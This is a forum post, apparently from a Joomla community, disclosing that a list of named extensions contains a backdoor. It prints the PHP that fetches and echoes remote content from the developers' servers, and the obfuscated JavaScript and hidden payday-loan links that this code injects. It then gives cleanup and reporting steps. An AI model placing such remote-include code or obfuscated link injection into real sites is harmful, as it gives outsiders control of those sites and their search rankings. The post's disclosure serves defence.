Extensions from this developer/company contain malicious code that fetches a file from their server and inserts it into your site. Right now they are inserting hidden backlinks to their Payday L0ans website, which is terrible in itself as this practice can affect YOUR Google rankings, but they also have the ability to insert whatever code they like and do can whatever they like to your website. This is a huge security vulnerability. As such, the extensions have been removed from the JED, but they are still on tens of thousands of websites.
The most popular vulnerable extensions are:
- Autson Skitter Slideshow (mod_AutsonSlideShow)
The malicious code is located in the "tmpl" folder, in the php file(s).
- Share This for Joomla! (mod_JoomlaShare This)
The malicious code is located in mod_JoomlaShare This.php.
- VirtueMart Advanced Search (mod_virtuemart_advsearch)
The malicious code is located in mod_virtuemart_advsearch.php.
- AddThis For Joomla (mod_AddThisForJoomla)
The malicious code is located in mod_AddThisForJoomla.php.
- Plimun Nivo Slider (mod_PlimunNivoSlider)
The malicious code is located in the "tmpl" folder, in the php file(s).
The hidden backlinks are being inserted via the following code:
Code: Select all
<?php
$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);
echo $credit;
?>
Code: Select all
<?php
$credit=file_get_contents('http:// www.autson.com/p.php?i='.$path);
echo $credit;
?>
This is what that code is inserting into the site:
Code: Select all
<script language="JavaScript">
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787',
'949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
</script>
<p class="dnn"By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
Code: Select all
<script language="JavaScript">
function nemoViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896',
'877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
</script>
<p class="nemonn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
iNowWeb.com (author: Sharif Mamdouh):
- iNowSlider (mod_iNowSlider)
- iNow Twitter Widget (mod_TwitterWidget)
- BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
- Quotes By keyWord! (mod_JoomlaQuotes)
- iNow Wikio (mod_JoomlaWikio)
- iNow Twitter (mod_TwitterForJoomla)
- QuickJump for Joomla! (mod_quickjump)
Autson.com (author: xing):
- FaceBook Slider
- Twitter Friends & Followers
- Flying Tweets
- Autson Twitter Search
- Twitter Quote
- FaceBook Show
Plimun.com:
- Plimun Twitter Ticker
- Twitter Show
I've managed to gather a list of around 20,000 vulnerable websites that have installed extensions from this developer and are displayed hidden backlinks that are inserted by the extensions. The list is by no means comprehensive, but I believe it has a large portion of the vulnerable websites. You can see the list here: http://pastebin.com/tWfiKcrr
So what can we do to stop these spammers/hackers?
1. Remove the extensions from your or your clients websites (or just remove the malicious code).
2. Do our best to reach out to the webmasters of the sites in the pastebin list above.
3. Report their domain names for spam/abuse to . They are all registered at Namecheap. The more people that complain, the more likely Namecheap will act. The domain names are:
Code: Select all
autson.com , inowweb.com , plimun.com